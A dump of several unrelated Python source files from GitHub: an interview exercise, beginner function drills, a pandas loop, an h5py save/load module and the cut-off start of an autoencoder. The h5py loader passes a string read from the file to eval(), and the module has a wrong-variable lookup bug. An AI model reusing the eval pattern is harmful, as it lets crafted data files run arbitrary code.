[]\n# for num in arr:\n# for i in range(15, -1, -1):\n# if num & (1 << i):\n# bits.append(1)\n# else:\n# bits.append(0)\n# bits = bits[:n]\n# cnt = Counter(bits)\n# if cnt[1] == n or cnt[0] > cnt[1]:\n# print(0)\n# return\n#\n# nebits = list(map(lambda x: x ^ 1, bits))\n# lspan = 0\n# for span in range(1, n):\n# flag = True\n# for i, c in enumerate(bits):\n# if c == 1:\n# continue\n# else:\n# if i + span > n or bits[i + span] == 0:\n# flag = False\n# break\n# if flag:\n# lspan = span\n# break\n#\n# rspan = 0\n# for span in range(1, n):\n# flag = True\n# for i in range(len(bits) - 1, -1, -1):\n# if bits[i] == 1:\n# continue\n# else:\n# if i - span < 0 or bits[i - span] == 0:\n# flag = False\n# break\n# if flag:\n# rspan = span\n# break\n#\n# # arr = []\n# # i = 0\n# # while i < n:\n# # j = i + 1\n# # while j < n and bits[j] == bits[i]:\n# # j += 1\n# # arr.append((bits[i], j - i))\n# # i = j\n# # rightF = True\n# # rans = 0\n# # r = ''\n# # for i in range(len(arr)):\n# # if arr[i][0] == 0:\n# # if i > 0 and arr[i - 1][1] >= arr[i][1]:\n# # rans = max(rans, arr[i][1])\n# # else:\n# # rightF = False\n# # break\n# l, r = '', ''\n# if rspan != 0:\n# tr = nebits[rspan:] + [0] * rspan\n# r = \"\".join(map(str, tr))\n# # leftF = True\n# # lans = 0\n# # l = ''\n# # for i in range(len(arr) - 1, -1, -1):\n# # if arr[i][0] == 0:\n# # if i < len(arr) - 1 and arr[i + 1][1] >= arr[i][1]:\n# # lans = max(lans, arr[i][1])\n# # else:\n# # leftF = False\n# # break\n#\n# if lspan != 0:\n# lr = [0] * lspan + nebits[:len(nebits) - lspan]\n# l = \"\".join(map(str, lr))\n# if lspan != 0 and rspan != 0:\n# print(2)\n# print(f'+{rspan}')\n# print(r)\n# print(f'-{lspan}')\n# print(l)\n# elif lspan != 0:\n# print(1)\n# print(f'-{lspan}')\n# print(l)\n# elif rspan != 0:\n# print(1)\n# print(f'+{rspan}')\n# print(r)\n# else:\n# print(0)\n#\n\n#\n\ndef func():\n buc = {\n ('!', '!'): 0,\n ('@', '!'): 13,\n ('!', '@'): 13,\n ('!', '#'): 4,\n ('#', '!'): 4,\n ('@', '@'): 7,\n ('#', '@'): 20,\n ('@', '#'): 20,\n ('#', '#'): 5\n }\n chars = '#@!'\n n = int(input().strip())\n s = input().strip()\n l, r = s.split(\"+\")\n if '.' not in l:\n l += '.0'\n if '.' not in r:\n r += '.0'\n al, ar = l.split('.')\n bl, br = r.split('.')\n def fn(s1, s2, carry):\n la, lb = len(s1), len(s2)\n size = max(la, lb)\n arr1, arr2 = ['0'] * size, ['0'] * size\n for i, c in enumerate(s1):\n arr1[i] = c\n for i, c in enumerate(s2):\n arr2[i] = c\n ans = ['0'] * size\n for i in range(size - 1, -1, -1):\n if arr1[i] in chars:\n tmp = buc[(arr1[i], arr2[i])]\n mod = (tmp + carry) % 10\n carry = (tmp + carry) // 10\n else:\n a, b = int(arr1[i]), int(arr2[i])\n mod = (a + b + carry) % 10\n carry = (a + b + carry) // 10\n ans[i] = str(mod)\n return ''.join(ans), carry\n\n rs, rc = fn(ar, br, 0)\n ls, lc = fn(al, bl, rc)\n ans = (str(lc) if lc else '') + ls + '.' + rs\n ans = float(ans)\n if int(ans) == ans:\n print(int(ans))\n else:\n print(ans)\n\n\nif __name__ == '__main__':\n func()\n\n # a = '0xE77F'\n # print(bin(int('14', 16)))\n # print(float('0250'))\n # print(int('0250'))\n","repo_name":"ccctw-ma/leetcode","sub_path":"src/InterviewTest/23.5.6huawei.py","file_name":"23.5.6huawei.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18493201809","text":"# All functions and classes that involve file interactions.\n# Oursourced from nnlib.nnlib with mo_05 to make the files smaller.\n__version__ = 'do_01'\n\nimport h5py\nimport numpy as np\nfrom pathlib import Path\nfrom collections.abc import Iterable\nfrom six import string_types\n\nfrom . import _interactive\nfrom .support_lib import MOD_SETTINGS, string_alts, NNLibUsageError\nfrom .abstract_containers import AbstractContainer, AbstractContainerGroup\nfrom .abstract_containers import is_cont_obj\n\n\n_func_containers = {}\n\n\ndef register_container(cont):\n _func_containers[cont.__name__] = cont\n\n\ndef instantiate_container(cont):\n \"\"\"Accepts either the name of a container in string form or a\n container object and builds an empty version of the container.\"\"\"\n if isinstance(cont, string_types):\n cont_name = cont\n elif is_cont_obj(cont) and cont.__name__ in _func_containers:\n cont_name = cont.__name__\n else:\n raise NNLibUsageError(\"Can only instantiate based on another \"\n \"object or string.\")\n try:\n return _func_containers[cont_name]()\n except KeyError:\n raise NNLibUsageError(\"Unknown container type: %s\", cont_name)\n\n\n# New in nnlib_v13: Unified design for all copy, save and load\n# operations that have been introduced up until now, handled by the\n# Copier class.\n\nclass Copier:\n \"\"\"Copiers can be instantiated directly or used by the functions\n implementing copy, load and save operations throughout the module.\n This is meant to streamline the process and make it easily\n expandable and flexible.\n \"\"\"\n\n def __init__(self, source=None, dest=None, deduplicator=None):\n \"\"\"Copier supports reading from and writing to\n AbstractContainer objects (source/dest need to be references to\n the requested objects). Note that this includes\n SerializedObjectHandler instances which provide the interface\n to data saved on disk.\n \"\"\"\n # A little sanity check (that can be overridden by setting the\n # DEBUG flag): If source and dest are able to tell their type\n # and they are equal, we should be safe to continue.\n # (Reminder: Them being equal does not necessarily mean they\n # are of the same type, but they contain the same kind of data.\n # This distinction is especially pertinent looking at\n # SerializedObjectHandler instances.) Otherwise we fail (or\n # warn).\n if source is None and dest is None:\n raise NNLibUsageError(\"Need to attach to at least one object.\")\n container_error = False\n if source is None:\n if is_cont_obj(dest):\n print(\"No source. Only 'set' operation is supported.\")\n else:\n container_error = True\n elif dest is None:\n if is_cont_obj(source):\n print(\"No destination. Only 'get' operation is supported.\")\n else:\n container_error = True\n else:\n if is_cont_obj(source) and is_cont_obj(dest):\n if not source.pull('type') == dest.pull('type'):\n if MOD_SETTINGS['DEBUG']:\n print(\"The types do not seem to match. Continue \"\n \"at your own risk.\")\n else:\n raise TypeError(\"The types do not match.\")\n else:\n container_error = True\n if deduplicator is not None:\n deduplicator.register(source, dest)\n if container_error:\n if MOD_SETTINGS['DEBUG']:\n print(\"The copier can only function on Container class \"\n \"instances, but at least one of source and dest \"\n \"does not look like one. Continue at your own \"\n \"risk.\")\n else:\n raise TypeError(\"The copier will only work on Container \"\n \"class instances.\")\n self.source = source\n self.dest = dest\n self.deduplicator = deduplicator\n\n def copy(self, target, dpcopy=None):\n \"\"\"Copys whatever is specified by 'target' (see the source's\n 'loadstore_keys' dict for valid keys) from source to\n destination. Note: For simplicity and security reasons, each\n Copier object can only work in one direction.\n Arguments\n target: Specifies what should be transferred from source to\n dest. Valid 'target' keys are either (iterables of)\n strings defined in the source's 'loadstore_instr' dict or\n 'all'. 'all' will transfer all targets that are currently\n enabled, i.e. contained in the source's loadstore_keys\n list.\n CHANGED in do_01: Target can now be an iterable, so more\n refined copy instructions are possible without rewriting\n 'loadstore_keys' of 'source'.\n dpcopy: Passing True forces the source to create carbon copys\n of the fields to be copied. False makes it only pass back\n references where applicable. When choosing None (default),\n the best guess (encoded in the source's 'loadstore_instr'\n dict) for each target key will be used.\n \"\"\"\n def _do_copy(key):\n \"\"\"Actually does the copying and the querying of the\n deduplicator.\n \"\"\"\n data = self.source.pull(key, dpcopy)\n if self.deduplicator:\n self.deduplicator.check(data)\n self.dest.push(key, data)\n # --Main function block--\n # Check if copying is available at all.\n if self.source is None or self.dest is None:\n raise NNLibUsageError(\"Copying is not supported in this context.\")\n # Choose applicable mode of operation.\n if target in string_alts['all']:\n # Shorthand notation for when everything is to be copied.\n for key in self.source.loadstore_instr.keys():\n _do_copy(key)\n elif (not isinstance(target, string_types)\n and isinstance(target, Iterable)):\n for key in target:\n _do_copy(key)\n else:\n _do_copy(target)\n\n def get(self, target, dpcopy=None):\n \"\"\"Gets whatever is specified by 'target' (see the source's\n loadstore_keys dict for valid keys) from source and returns it.\n Arguments\n target: Specifies what should be passed back. Valid 'target'\n keys are strings defined in the source's 'loadstore_instr'\n dict.\n dpcopy: Passing True forces the source to create carbon copys\n of the fields to be copied. False makes it only pass back\n references where applicable. When choosing the default\n None, the best guess (encoded in the source's\n 'loadstore_instr' dict) for each target key will be used.\n \"\"\"\n if self.source is None:\n raise NNLibUsageError(\"Getting is not supported in this context.\")\n return self.source.pull(target, dpcopy)\n\n def set(self, target, data):\n \"\"\"Sets the fields specified by 'target' (see the target's\n loadstore_keys dict for valid keys) in the destination to the\n list of data.\n \"\"\"\n if self.dest is None:\n raise NNLibUsageError(\"Setting is not supported in this context.\")\n self.dest.push(target, data)\n\n\nclass H5PyHandler(AbstractContainerGroup):\n \"\"\"This class contains everything necessary to interact with a .h5\n file that is used for loading and saving data to disk.\n \"\"\"\n\n def __init__(self, path, read_only=False):\n \"\"\"Accepts the path to a .h5 file. If read_only is True, the\n file must exist. Also, no operations that include a write\n operation will work. This is to guarantee that an existing\n save file cannot be changed accidentally. If read_only is\n False and the specified file does not exist, it will be\n created.\n \"\"\"\n self.read_only = read_only\n # H5PyHandler tracks the objects it already rebuilt.\n # This way, we avoid recreating multiple copies of the same\n # object.\n self.autobuilt_objs = {}\n self.tracked_objs = []\n # Make sure path is a pathlib path.\n path = Path(path)\n # Check the given path for plausible name extensions; add one\n # if none or a non-fitting one is present.\n if path.suffix not in {'.h5', '.hdf5'}:\n path = path.with_suffix('.h5')\n if path.exists() and not read_only:\n if _interactive:\n # In an interactive environment, have the user confirm\n # the overwrite.\n print(\"The given path already exists.\")\n resp = input(\"Overwrite completely? (If not, entries will \"\n \"only be selectively replaced) [yes/NO] > \")\n if not _interactive or resp in string_alts['yes']:\n try:\n path.unlink()\n except PermissionError:\n raise PermissionError(\"There was a problem overwriting \"\n \"the existing file. A likely cause \"\n \"is that it was not properly \"\n \"closed by another instance. \"\n \"(Path: %s)\" % str(path))\n # Open the file. These will throw errors if problems of any\n # sort are encountered. They are not caught as it makes the\n # most sense to fail and present them to the user.\n if read_only:\n self.file = h5py.File(str(path), mode='r')\n else:\n self.file = h5py.File(str(path), mode='a')\n\n def __del__(self):\n \"\"\"It is critical to properly close the hdf5 file once the\n Copier using the instance has expired, so we do just that when\n the current object gets garbage collected.\n \"\"\"\n self.file.close()\n del self.file\n\n def _write_dispatch(self, supergroup, name, data):\n \"\"\"There are several data structures that are not natively\n supported in a standard hdf5 file, so this function provides\n the necessary switching functionality to deal with all of them.\n As a general rule, all data is stored in attributes of the\n current group and that is also what is scanned when loading a\n file. If, however, there is anything more complex to be\n stored, the data will not be assigned directly; instead, a flag\n in the form of a string lead by two '@' symbols is assigned.\n Depending on the specific data type, either a dataset or a\n subgroup of the same name gets written into the file structure\n that then contains the data itself.\n \"\"\"\n # Check for Python strings.\n if isinstance(data, string_types):\n # These must be encoded into byte arrays before saving.\n supergroup.attrs[name] = data.encode('utf-8')\n # Check for Nonetypes.\n elif data is None:\n supergroup.attrs[name] = '@@None'\n # Check for numpy arrays.\n elif isinstance(data, np.ndarray):\n try:\n # Find arrays with multiple named fields by getting an\n # iterator over them. This will provoke an error if\n # there is only one field, serving as an implicit case\n # switch for simple datasets.\n names = iter(data.dtype.names)\n supergroup.attrs[name] = '@@multifieldds'\n subgroup = supergroup.create_group(name)\n self._write_dispatch(subgroup,\n '@shape',\n data.shape)\n for counter, fieldname in enumerate(names):\n self._write_dispatch(subgroup,\n str(counter).zfill(2) + fieldname,\n data[fieldname])\n except TypeError:\n # If no iterator could be obtained, we have a simple\n # dataset.\n supergroup.attrs[name] = '@@ds'\n self._write_dataset(supergroup, name, data)\n # Check for dictionaries.\n elif isinstance(data, dict):\n supergroup.attrs[name] = '@@dict'\n subgroup = supergroup.create_group(name)\n # CHANGED in nnlib_multiobject_v04: Not every immutable\n # data type can be used as a key in hdf5 files. To ensure\n # the fail-safeness and compatibility of the saving\n # process, the keys and values are now indexed (the\n # ordering doesn't matter) and both are saved individually.\n index = 0\n for key, value in data.items():\n # Call this function recursively for every key and\n # value in the dictionary.\n self._write_dispatch(subgroup, 'key_' + str(index), key)\n self._write_dispatch(subgroup, 'value_' + str(index), value)\n index += 1\n # Check for lists and tuples.\n elif isinstance(data, list) or isinstance(data, tuple):\n # Both can be dealt with in the same way as no functions in\n # this module care about the differences between them in\n # their inputs.\n supergroup.attrs[name] = '@@list'\n subgroup = supergroup.create_group(name)\n for i, d in enumerate(data):\n # Call this function recursively for every entry in the\n # list or tuple. Note that the attributes will be\n # numbered in ascending order to save the exact\n # sequence.\n self._write_dispatch(subgroup, str(i), d)\n # Check for sets.\n elif isinstance(data, set):\n # These are basically handled the same way as lists and\n # tuples. However, they are unordered and not interoperable\n # with lists and tuples in every context (e.g. they support\n # set operations like union), so we deal with them\n # separately.\n supergroup.attrs[name] = '@@set'\n subgroup = supergroup.create_group(name)\n for i, d in enumerate(data):\n # Call this function recursively for every entry in the\n # set. Note that sets are not ordered, but the items do\n # nevertheless receive a number (i) to simplify loading.\n self._write_dispatch(subgroup, str(i), d)\n # Check for frozen sets.\n elif isinstance(data, frozenset):\n # Frozen sets are mostly the same as sets, but they are\n # immutable which is important in certain contexts. (For\n # example, frozen sets can be used as dictionary keys.)\n # This is why they get special treatment.\n supergroup.attrs[name] = '@@frozenset'\n subgroup = supergroup.create_group(name)\n for i, d in enumerate(data):\n # Call this function recursively for every entry in the\n # set. Note that sets are not ordered, but the items do\n # nevertheless receive a number (i) to simplify loading.\n self._write_dispatch(subgroup, str(i), d)\n # Check if the data is an AbstractContainer instance (or looks\n # reasonably similar to one).\n elif is_cont_obj(data):\n # First, pull the identifying info from the container.\n cont_type = data.pull('type')\n cont_id = data.pull('id')\n # Create the magic key that will trigger instantiation of a\n # container object when the data is loaded and save\n # corresponding meta information.\n supergroup.attrs[name] = '@@contobject'\n subgroup = supergroup.create_group(name)\n subgroup.attrs['type'] = cont_type\n subgroup.attrs['id'] = cont_id\n # Test if the object was registered as having been saved\n # before. In that case, we do not want to overwrite.\n if not (cont_type,cont_id) in self.tracked_objs:\n # If it was not saved by this handler instance before,\n # we trigger an autosave.\n # Note that, during the copying process, the data will\n # be registered as a tracked object. This means that\n # a handler will not do implicit saving twice using the\n # same deduplication mechanism.\n subobj_handler = self.provide_access(cont_type, cont_id)\n subobj_copier = Copier(data, subobj_handler, self)\n subobj_copier.copy('all', dpcopy=False)\n # Check for function handles.\n elif callable(data):\n try:\n # Try out whether or not the function is accessible\n # from the base level of the nnlib module. If it is\n # not, a NameError will be thrown and caught below and\n # the function will be marked as having failed to be\n # saved. This is to make the saving and loading\n # process more reliable.\n exec(data.__name__)\n supergroup.attrs[name] = '@@func'\n except NameError:\n print(\"Function handles whose targets do not live in the \"\n \"namespace of the NNLib module cannot be recovered \"\n \"correctly as of version \" + __version__ + \". The \"\n \"function \" + data.__name__ + \" will therefore be \"\n \"skipped.\")\n supergroup.attrs[name] = '@@failed_func'\n supergroup[name] = data.__name__\n else:\n # The standard case for primitive data types: Save the data\n # as-is.\n supergroup.attrs[name] = data\n # Note that all errors raised here mean we have an\n # unhandled case, so there is no further catching\n # because the user should see the error.\n\n def _write_dataset(self, group, name, data):\n \"\"\"Takes care of writing datasets. Since H5Py does not like\n Unicode, this function will try to convert the data to fixed\n length binary strings if the assignment fails at first.\n \"\"\"\n try:\n group.create_dataset(name, data=data, compression='gzip')\n except TypeError:\n group.create_dataset(name, data=data.astype('a12'),\n compression='gzip')\n\n def _read_dispatch(self, supergroup, name):\n \"\"\"The sister function to _write_dispatch, designed to restore\n data that was saved using that. Returns the data in the\n original form to the caller.\n \"\"\"\n try:\n # Fetch the data from the file.\n data_in = supergroup.attrs[name]\n except KeyError:\n print(\"The key '\" + name + \"' is not present in the file. The \"\n \"reason may be that this file was saved with a previous \"\n \"version of the program.\")\n if _interactive:\n resp = input(\"Continue and replace with None? [yes/NO] > \")\n if resp in string_alts['yes']:\n return None\n else:\n raise\n else:\n raise\n # For compatibility and stability reasons, it is better to turn\n # the read data back into basic python types if they are numpy\n # ones. Note that this will not convert datasets because they\n # are handled separately, but only basic data types that get\n # stored directly as attributes in the file.\n if hasattr(data_in, 'dtype'):\n data_in = data_in.item()\n # The following are all the necessary switch cases to support\n # more complex data structures that h5py does not support\n # natively.\n if isinstance(data_in, bytes):\n data_out = data_in.decode('utf-8')\n elif data_in == '@@multifieldds':\n data_out = self._read_multifieldds(supergroup[name])\n elif data_in == '@@ds':\n data_out = self._read_dataset(supergroup[name])\n elif data_in == '@@dict':\n data_out = {}\n subgroup = supergroup[name]\n index = 0\n while ('key_' + str(index)) in subgroup.attrs.keys():\n key = self._read_dispatch(subgroup, 'key_' + str(index))\n value = self._read_dispatch(subgroup, 'value_' + str(index))\n data_out[key] = value\n index += 1\n elif data_in == '@@list':\n data_out = []\n subgroup = supergroup[name]\n for key in range(len(subgroup.attrs)):\n data_out.append(self._read_dispatch(subgroup, str(key)))\n elif data_in in ('@@set','@@frozenset'):\n data_out = set()\n subgroup = supergroup[name]\n for key in range(len(subgroup.attrs)):\n data_out.add(self._read_dispatch(subgroup, str(key)))\n if data_in == '@@frozenset':\n data_out = frozenset(data_out)\n elif data_in == '@@contobject':\n # Container objects are to be understood as internal links\n # within the save file. They reference another base item\n # in the same file and are identified via a unique ID. It\n # is common to see multiple objects referencing the same\n # subobjects. These cross connections are all saved and\n # restored as well, in the sense that no automatically\n # built subobject is reconstructed twice, basically\n # creating multiple copys, but instead providing references\n # when the subobject comes up again.\n cont_type = supergroup[name].attrs['type']\n cont_id = supergroup[name].attrs['id']\n if (type,id) in self.autobuilt_objs:\n # If the type and ID are in autobuilt_subobjs, simply\n # pull the reference and return that.\n data_out = self.autobuilt_objs[(cont_type,cont_id)]\n else:\n # If we land here, the object needs to be built.\n # Instantiate the object...\n data_out = instantiate_container(cont_type)\n # ...and fill it with the saved data by creating a new\n # copier and have it copy everything it finds.\n subobj_handler = self.provide_access(cont_type, cont_id)\n subobj_copier = Copier(subobj_handler, data_out)\n subobj_copier.copy('all')\n self.autobuilt_objs[(cont_type,cont_id)] = data_out\n elif data_in == '@@func':\n # Currently untested and likely broken. TODO: Test and fix!\n data_out = eval(supergroup[name][()])\n elif data_in == '@@failed_func':\n print(\"A function handle that could not be recovered was found: \"\n + supergroup[name][()])\n print(\"It will be substituted with a NoneType and we will try to \"\n \"run anyway. Expect errors!\")\n data_out = None\n elif data_in == '@@None':\n data_out = None\n else:\n data_out = data_in\n return data_out\n\n def _read_multifieldds(self, group):\n \"\"\"Reconstructs multi-field datasets like the ones FieldCreator\n objects create for base_data.\n \"\"\"\n shape = self._read_dispatch(group, '@shape')\n base_ndim = len(shape)\n daughter_ds = []\n daughter_dtypes = []\n for key in group.attrs.keys():\n if group.attrs[key] == '@@ds':\n daughter_ds.append(self._read_dataset(group[key]))\n elif group.attrs[key] == '@@multifieldds':\n daughter_ds.append(self._read_multifieldds(group[key]))\n elif key == '@shape':\n continue\n else:\n raise ValueError(\"Multifield datasets can only contain \"\n \"elementary datasets or other multifield \"\n \"datasets. The key '\" + key + \"' that was \"\n \"found points to neither of them.\")\n # It turns out that with multi-field datasets, it is\n # helpful to save the order of the internal fields as they\n # are indeed stored as a list internally. While this is\n # not noticeable in most situations, it does cause errors\n # when concatenating datasets of the same shape, but a\n # different internal ordering. We conserve the order by\n # putting a number in front of the field name at save time.\n # The ordering imposed this way is automatically followed\n # by the 'for' loop, so here we just have to eliminate the\n # numbers again.\n # The case switch should make sure that we can at least\n # adequately load the old saved data even though the\n # original order is lost.\n daughter_dtypes.append((key[2:],\n daughter_ds[-1].dtype,\n daughter_ds[-1].shape[base_ndim:]))\n data = np.empty(shape, dtype=daughter_dtypes)\n for field, name in zip(daughter_ds, daughter_dtypes):\n data[name[0]] = field\n return data\n\n def _read_dataset(self, dataset):\n \"\"\"Reads datasets. This is the inverse function of\n _write_dataset.\n \"\"\"\n data = np.empty(dataset.shape, dtype=dataset.dtype)\n # UPDATE: This read_direct instruction will fail rather\n # ungracefully if the dataset is of size zero, meaning there\n # is a zero dimension. By far the easiest solution in this\n # case is to simply not try to read anything. Since the\n # array created above cannot contain data anyway, there is\n # nothing further to consider.\n if min(dataset.shape) > 0:\n dataset.read_direct(data)\n # FIX: Data type checking for byte type must be done even if\n # the dataset is empty to avoid errors.\n if np.issubdtype(data.dtype, np.bytes_):\n data = data.astype('U12')\n return data\n\n # --Public functions--\n\n def register(self, source, dest):\n if dest.outer is not self:\n raise TypeError(\"Error using the deduplication engine: \"\n \"H5PyHandler instances can only track their own \"\n \"contents.\")\n self.tracked_objs.append((source.pull('type'),source.pull('id')))\n\n def check(self, data):\n \"\"\"Checking for duplications is redundant for H5PyHandler as\n the data dict is traversed when saving, anyway, so it is\n enough to deduplicate then.\"\"\"\n return data\n\n def create_instance(self, obj):\n obj_type = obj.pull('type')\n obj_id = obj.pull('id')\n return self.provide_access(obj_type, obj_id)\n\n def compile_entries_list(self):\n \"\"\"This method provides a nested dict with informations on the\n h5 file's contents. It is designed to enable a (user-driven or\n automated) selection of datasets to access.\n \"\"\"\n type_dict = {}\n for group_name in self.file.keys():\n base_name, base_id = group_name.split('_')\n if base_name not in type_dict.keys():\n type_dict[base_name] = {}\n contained_data = list(self.file[group_name].keys())\n type_dict[base_name][base_id] = contained_data\n return type_dict\n\n def interactive_provide_access(self, obj_type):\n \"\"\"A more user friendly variant of 'provide_access', this\n function takes a type and simplifies dealing with the internal\n IDs. If there is only one object fitting 'type' in the file,\n its ID is completely shadowed. If there is more than one and\n we are running interactively, a selection is presented to the\n user. In the same case but not running interactively, the\n first instance on the list is selected. If there is no fitting\n entry, an error is raised.\n \"\"\"\n type_dict = self.compile_entries_list()\n if obj_type in type_dict:\n mhandler_dict = type_dict[obj_type]\n if _interactive and len(mhandler_dict) > 1:\n print(\"Multiple \" + obj_type + \" instances found.\")\n selection = []\n for counter, variant in enumerate(mhandler_dict):\n selection.append(variant)\n print(\" \" + str(counter) + \": ID \" + str(variant)\n + \" containing \" + str(mhandler_dict[variant]))\n resp = input(\"Please select [/ABORT] > \")\n try:\n obj_id = selection[int(resp)]\n except (KeyError,ValueError):\n print(\"Aborted.\")\n return\n else:\n obj_id = list(mhandler_dict.keys())[0]\n else:\n raise NNLibUsageError(\"No \" + obj_type + \" instance found.\")\n return self.provide_access(obj_type, obj_id)\n\n def provide_access(self, obj_type, obj_id):\n \"\"\"Provides access to data groups within the file. Up-to-date\n infos about the file's contents can be gathered by calling\n 'compile_entries_list'.\n CHANGED in nnlib_multiobject_v06: This function got a more\n feature-rich partner in interactive_provide_access that\n automates the selection process and takes only the 'type'\n string directly.\n Arguments\n type: A string that specifies the data group type. This\n should indicate what its contents are used for or where\n they came from. Must be provided.\n id: Since we allow multiple data groups of the same type,\n some kind of counting number is always attached to the type\n string. All AbstractContainer instances offer such an ID\n through their pull function.\n \"\"\"\n if not (obj_type + '_' + str(obj_id)) in self.file.keys():\n self.file.create_group(obj_type + '_' + str(obj_id))\n return SerializedObjectHandler(self, obj_type, obj_id)\n\n\nclass SerializedObjectHandler(AbstractContainer):\n \"\"\"CHANGED in nnlib_multiobject_v04: H5PyHandler has become a lot\n dumber in the sense that it does not rely on keys provided from the\n outside for reading and writing to files anymore. Instead, it (or\n more to the point, the SerializedObjectHandler instances it creates\n for file access) reads and writes whatever you throw at it. It is\n the partner methods' responsibility to deal with complications\n arising from this. The idea behind this is that the Hdf5 access\n can be generic while each container and handler that wants to get\n or save data knows for itself how to deal with its contents.\n \"\"\"\n\n def __init__(self, outer, cont_type, cont_id):\n \"\"\"SerializedObjectHandler needs the following arguments at\n init time.\n Arguments:\n outer: The H5PyHandler instance that created this handler\n instance.\n type: The type of object stored, i.e. the name of a nnlib\n container class.\n id: The unique ID of object stored as provided by said\n object.\n \"\"\"\n self.outer = outer\n self.type = cont_type\n self.id = cont_id\n self.file_access_point = outer.file[cont_type + '_' + str(cont_id)]\n # CHANGED: For compatibility reasons, loadstore_instr needs to\n # be a dict. SerializedObjectHandler instances don't need\n # instructions, though, so we fill it with Nones.\n self.loadstore_instr = {}\n for key in self.file_access_point.keys():\n self.loadstore_instr[key] = None\n\n def provide_deduplicator(self):\n return self.outer\n\n def push(self, target, data):\n \"\"\"Receives data that it then writes to the file.\"\"\"\n # Since the file may have been written to before, try to delete\n # the respective group. If that doesn't work, it seems safe to\n # assume that it was not present in the first place and we can\n # continue.\n try:\n del self.file_access_point.attrs[target]\n del self.file_access_point[target]\n except KeyError:\n pass\n # Dispatch. Note that this handler relies on the H5PyHandler\n # it is attached to for the actual saving.\n self.outer._write_dispatch(self.file_access_point, target, data)\n\n def pull(self, target, dpcopy=None):\n \"\"\"Gets and returns data from the h5 file.\n To keep the pull infrastructure consistent with other Container\n classes, the 'dpcopy' argument is accepted but quietly ignored\n because copying (into RAM) is the only mode of operation that\n makes sense when loading from disk.\n \"\"\"\n if target == 'id':\n return self.id\n elif target == 'type':\n return self.type\n else:\n # Dispatch.\n return self.outer._read_dispatch(self.file_access_point, target)","repo_name":"mengze21/Arithmetik-feur-Bildinhalte-mit-Neuronale-Netzen","sub_path":"nnlib/data_ops.py","file_name":"data_ops.py","file_ext":"py","file_size_in_byte":33531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17877353285","text":"# Import cars data\r\nimport pandas as pd\r\ncars = pd.read_csv('cars.csv', index_col = 0)\r\n\r\n# Code for loop that adds COUNTRY column\r\nfor l,r in cars.iterrows():\r\n cars.loc[l,'COUNTRY']=str.upper(r['country'])\r\n\r\n# Print cars\r\nprint(cars)","repo_name":"vjjy001/jdatacamp","sub_path":"PythonLearn/datacamp/loops/exp09.py","file_name":"exp09.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8069903726","text":"# Exercise 1: ---Number length of asterisks---\ndef asterisk(num):\n string = ''\n for i in range(num):\n string += '*'\n return string\n\n\nprint(asterisk(10))\n\n\n# Exercise 2: ---Sum of 2 numbers---\ndef multiply(x, y):\n return x * y\n\n\nprint(multiply(5, 6))\n\n\n# Exercise 3: ---Rectangle of asterisks---\ndef rectangle(width, height):\n line = ''\n for i in range(width):\n line += '*'\n rectangle = ''\n for x in range(height):\n rectangle += f\"{line}\\n\"\n return rectangle\n\n\nprint(rectangle(10, 4))\n\n\n# Exercise 4: ---Rectangle of any sign---\ndef rectangle(width, height, sign):\n line = ''\n for i in range(width):\n line += f'{sign}'\n rectangle = ''\n for x in range(height):\n rectangle += f\"{line}\\n\"\n return rectangle\n\n\nprint(rectangle(10, 4, '#'))\n\n\n# Exercise 5: ---Power of number with another---\ndef power(x, y):\n return x ** y\n\n\nprint(power(5, 6))\n\n\n# Exercise 6: ---Upside down a number---\ndef upside_down(num):\n a = str(num)\n b = a[::-1]\n return int(b)\n\n\nprint(upside_down(167))\n\n\n# Exercise 7: ---Char in string---\ndef find(char, string):\n counter = string.count(char)\n if counter == 0:\n return -1\n else:\n return counter\n\n\nprint(find('a', \"abanibi obohebev obotabach\"))\n\n\n# Exercise 8: ---Factorial of number---\ndef factorial(num):\n sum = 1\n for i in range(num):\n sum = sum * num\n num -= 1\n return sum\n\n\nprint(factorial(5))\n\n\n# Exercise 9: ---Add beep to string---\ndef beep(string):\n return f\"{string} beep\"\n\n\nprint(beep(\"what does the fox say?\"))\n\n\n# Exercise 10: ---Multiply under zero?---\ndef mul_2nums(x, y):\n if (x * y) < 0:\n return 0\n else:\n return x * y\n\n\nprint(mul_2nums(9, -20))\n\n\n# Exercise 11: ---Number of digits in number---\ndef digits(num):\n return len(str(num))\n\n\nprint(digits(12345678))\n","repo_name":"elorisraeli/pythonProject1","sub_path":"Mechina-Classes/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"15237796254","text":"import tensorflow as tf\nimport numpy as np\n\n\nclass CompressNet:\n \"\"\"\n This network(Auto-encoder) converts input to\n 1. (compressed) low dimensional Representation\n 2. reconstruction error\n \"\"\"\n\n def __init__(self, hidden_layer_sizes, activation=tf.nn.tanh):\n \"\"\"\n param\n ------------------------\n 1. hidden_layer_size : list of int(hidden layer sizes)\n ex) hidden_layer_size = [n1, n2]\n input => n1 => n2 => n1 => input\n 2. activation : activation function of hidden layer\n ------------------------\n \"\"\"\n\n self.hidden_layer_sizes = hidden_layer_sizes\n self.activation = activation\n\n def encoder(self, x):\n self.input_size = x.shape[1]\n\n n_layer = 0\n encoder = tf.keras.Sequential(name='encoder')\n # input layer 추가해주고 가는 것도 좋을 것 같은데??\n\n for size in self.hidden_layer_sizes[:-1]:\n n_layer += 1\n encoder.add(tf.keras.layers.Dense(size,\n activation=self.activation,\n name='layer_{}'.format(n_layer)))\n n_layer += 1\n encoder.add(tf.keras.layers.Dense(self.hidden_layer_sizes[-1],\n name='layer_{}'.format(n_layer)\n ))\n return encoder(x)\n\n def decoder(self, z):\n n_layer = 0\n decoder = tf.keras.Sequential(name='decoder')\n for size in self.hidden_layer_sizes[:-1][::-1]:\n n_layer += 1\n decoder.add(tf.keras.layers.Dense(size,\n activation=self.activation,\n name=\"layer_{}\".format(n_layer)))\n n_layer += 1\n decoder.add(tf.keras.layers.Dense(self.input_size,\n name=\"layer_{}\".format(n_layer)))\n return decoder(z)\n\n\n\n\n\n def loss_as_feature(self, x, x_re):\n \"\"\" Loss for z_r, there are two losses\n 1. loss_E : relative Euclidean distance\n 2. loss_C : Cosine similarity\n 